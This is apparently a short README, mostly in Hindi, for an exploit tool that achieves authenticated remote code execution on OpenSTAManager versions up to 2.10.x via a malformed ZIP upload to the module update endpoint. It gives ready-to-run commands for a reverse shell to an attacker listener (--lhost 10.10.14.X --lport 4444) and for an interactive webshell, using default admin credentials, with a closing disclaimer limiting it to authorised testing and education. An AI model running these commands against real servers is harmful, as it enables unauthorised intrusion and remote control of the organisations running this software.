
OpenSTAManager के लिए प्रमाणित दूरस्थ कोड निष्पादन शोषण, अमान्य ZIP अपलोड के माध्यम से, अधिकृत पैठ परीक्षण के लिए रिवर्स शेल और इंटरैक्टिव वेबशेल क्षमताएं प्रदान करता है।
मॉड्यूल अपडेट एंडपॉइंट में अमान्य ZIP अपलोड के माध्यम से प्रमाणित RCE।
प्रभावित: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
केवल अधिकृत पेनिट्रेशन परीक्षण और शैक्षिक उद्देश्यों के लिए।